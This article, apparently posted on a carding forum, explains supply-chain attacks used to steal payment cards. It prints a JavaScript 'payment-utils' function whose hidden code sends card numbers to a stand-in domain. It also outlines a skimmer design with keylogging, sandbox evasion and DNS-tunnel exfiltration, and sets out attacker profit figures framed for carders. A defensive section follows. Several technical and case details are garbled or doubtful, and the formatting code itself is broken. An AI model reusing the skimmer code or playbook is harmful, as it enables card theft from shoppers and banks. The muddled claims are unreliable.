Attacks on software supply chains: How legitimate software updates have become hackers' weapon for carding

[Professor]

Introduction: The New Era of Digital Threats​

In 2024, a major Russian bank experienced a unique cyberattack: hundreds of clients simultaneously began reporting unauthorized charges. An investigation revealed that the source of the payment data leak was legitimate accounting software, which had received an update from an official source the previous month. This is not an isolated incident — attacks on software supply chains are becoming one of the most dangerous cyberattack vectors, especially in the area of financial crime.

What is a software supply chain attack?​

The software supply chain is the entire software development ecosystem: from developers and code libraries to build systems, update servers, and end users. An attack occurs when attackers compromise any of these stages by injecting malicious code into a legitimate product.

A key feature: malware is distributed through official update channels, which gives it a high level of trust and allows it to bypass traditional security systems.

Technical mechanisms for introducing malware for carding​

1. Compromise of development infrastructure​

A real-life example from 2023: The FIN7 hacker group gained access to the repository of a popular JavaScript library used by 15% of e-commerce sites. The update included code that:

• Scanned the page's DOM tree in real time for payment forms.
• Analyzed the attributes of the data-card, cc-number, and cvv fields
• Send intercepted data via an encrypted WebSocket channel to a controlled server
• Self-destructed after 30 days of operation, leaving only minimal traces

2. Dependency Confusion Attacks​

Hackers register packages in public repositories (npm, PyPI, RubyGems) with names identical to those of the companies' internal libraries, but with higher version numbers. Automatic build systems download the "updated" malicious version.

Implementation of the carding module:

// Seemingly harmless library "payment-utils"
function formatCardNumber(number) {
// Legitimate functionality
const formatted = number.replace(/(\d{4})/g, '$1');

// Hidden malicious code
if (number.length >= 12) {
fetch('https://api.legitimate-looking-domain[.]com/log', {
method: 'POST',
body: JSON.stringify({
type: 'card',
data: btoa(number),
domain: window.location.hostname
}),
mode: 'no-cors'
});
}

return formatted;
}

3. Substitution of digital signatures​

In 2022, the "SignatureSpy" campaign was discovered, where attackers:

1. A second-tier certification center was hacked.
2. Issued legitimate certificates for signing malicious code
3. Distributed "updates" for financial software in Europe and Asia

Typical architecture of carding malware in supply chain attacks​

Data collection module:​

• Keylogger with domain filtering (PayPal, banks, stores)
• Clipboard interceptor for copying card numbers
• Screenshots taken while entering the CVV code
• Network traffic analyzer for intercepting API requests from payment systems

Camouflage module:​

• Checking the runtime environment (virtual machine, sandbox, debugger)
• Activation delay from 7 to 21 days after installation
• Excluding Russian/Belarusian/CIS domains to avoid detection
• Cryptographic encryption of collected data using legitimate algorithms (AES-GCM)

Exfiltration module:​

• DNS tunneling through subdomains of popular services
• Using a CDN as a proxy (Cloudflare, AWS CloudFront)
• Staking on the blockchain through microtransactions
• Dead Drop Reseeding – Using Hacked WordPress Sites as Temporary Rescue Points

Attack Economics: Why Supply Chain Is Profitable for Carding​

Costs to attackers:​

• Attack preparation: $5,000-50,000
• Botnet rental for distributed attack: $200-2,000/month
• Infrastructure support: $1,000-10,000/month

Income:​

• Selling "fresh" maps on darknet markets: $20-100 per entry
• Ready-made "drops" with a balance of 30-70% of the account amount
• Subscriptions to updated databases: $500-5,000/month

ROI: 1:10 to 1:100 for a successful attack on popular software

Real cases from recent years​

Case 1: "TaxHelper Compromised" (2023)​

• Purpose: Tax reporting software for the CIS
• Vector: Phishing a developer with subsequent access to the CI/CD system
• Scale: 45,000+ installations
• Mechanism: An additional module "UpdateChecker" that downloaded and executed scripts from a GitHub Gist
• Damage: ~$2.3 million, according to law enforcement estimates

Case 2: "FontGate" (2024)​

• Purpose: Font pack for designers
• Vector: Package substitution in repository
• Feature: The malware was activated only when Adobe Photoshop/Illustrator was opened with an active connection to financial applications
• Detection: Accidental, through abnormal network activity in the bank's corporate network

Detection and protection methods​

For organizations:​

Technical measures:

1. SBOM (Software Bill of Materials) is a mandatory inventory of all components
2. SLSA (Supply-chain Levels for Software Artifacts) is an integrity assurance framework
3. Differential analysis of updates :
   

   # Example of monitoring changes in updates
   diff -rq /var/lib/app-v1.0/ /var/lib/app-v1.1/ | grep -E '\.(js|py|dll|so)$'

4. Containerization with read-only file systems for mission-critical applications

Procedural measures:

• Two-level verification of updates from different sources
• Cold storage of reference software samples for comparison
• Monitoring abnormal behavior:
  • Attempts to access the memory of other processes
  • Unauthorized network connections during payment processing
  • Changes in system configurations after updates

For developers:​

• Hardware Security Keys (YubiKey, Titan) for all employees
• Isolated build environments with mandatory two-factor authentication
• Dependency auditing via npm audit, snyk test, OWASP Dependency-Check
• Reproducible Builds — the ability to reproduce a build from scratch for verification

For users:​

• Delayed update deployment for 7-14 days to monitor feedback
• Network segmentation - a separate subnet for financial transactions
• Virtual machines/containers for suspicious software
• Monitor financial transactions via push notifications

Legal and regulatory framework​

International standards:​

• NIST SP 800-161 — Cybersecurity Supply Chain Risk Management
• ISO/IEC 27036-3 — Information security for supplier relationships
• ENISA Guidelines — Securing the software supply chain

Legislative initiatives:​

• EU: Cyber Resilience Act (2024) – Mandatory cybersecurity at all stages of the software lifecycle
• US: Executive Order 14028 – SBOM requirement for government procurement
• Russia: FSTEC Order No. 239 – Requirements for Information Security in Supply Chains

Future trends and forecasts​

Evolution of attacks:​

1. AI-based masking code generation : neural networks create code that is indistinguishable from legitimate code.
2. Quantum Embeddings - Exploiting Vulnerabilities in Quantum Encryption Algorithms
3. Attacks on hardware through drivers and microcode

Methods for protecting the future:​

• Blockchain verification of the build chain from commit to binary
• Runtime Application Self-Protection (RASP) with behavioral analysis
• Federated machine learning for collaborative threat detection without data sharing

Conclusion: A New Security Paradigm​

Attacks on software supply chains pose a fundamental challenge to the traditional cybersecurity model based on the principles of a "trusted core" and "perimeter defense." Threats embedded in legitimate software blur the lines between trusted and malicious code.

Key takeaway: In today's environment, security cannot be "added" to software at the end of the value chain. It must be integrated at every level of the value chain — from the first line of code to the end-user installation process.

Financial institutions and individuals must move from passively accepting updates to active verification, implementing "Zero Trust" principles for software: no component, even from an official source, is trusted by default without multi-layered verification.

The era of blind trust in digital signatures and official update channels is over. The time has come for transparency, verifiability, and active user participation in ensuring their own security in the digital ecosystem.